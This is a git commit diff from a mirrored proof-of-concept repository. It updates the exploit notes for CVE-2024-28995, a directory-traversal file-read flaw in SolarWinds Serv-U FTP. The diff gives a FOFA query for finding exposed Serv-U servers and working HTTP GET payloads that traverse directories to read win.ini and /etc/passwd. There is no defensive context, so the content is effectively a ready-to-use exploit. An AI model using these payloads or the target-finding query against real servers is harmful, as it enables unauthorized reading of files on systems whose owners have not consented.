mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
修改数据包
This commit is contained in:
parent
1d29022cc3
commit
4fe572e1a5
@ -7,14 +7,26 @@ CVE-2024-28995 SolarWinds Serv-U FTP目录遍历文件读取漏洞,攻击者
|
||||
## fofa
|
||||
|
||||
```
|
||||
app="SolarWinds-Serv-U-FTP"
|
||||
server="Serv-U"
|
||||
```
|
||||
|
||||
## poc
|
||||
|
||||
```
|
||||
GET /?InternalDir=/../../../../Windows/&InternalFile=win.ini HTTP/1.1
|
||||
Host:
|
||||
GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1
|
||||
Host: xx.xxx.xxx.xxx
|
||||
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
|
||||
Accept: */*
|
||||
Connection: Keep-Alive
|
||||
```
|
||||
|
||||
```
|
||||
GET /?InternalDir=\..\..\..\..\etc&InternalFile=passwd HTTP/1.1
|
||||
Host: xxx.xxx.xxx.xxx
|
||||
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Connection: keep-alive
|
||||
```
|
||||
|
||||

|
||||
Loading…
x
Reference in New Issue
Block a user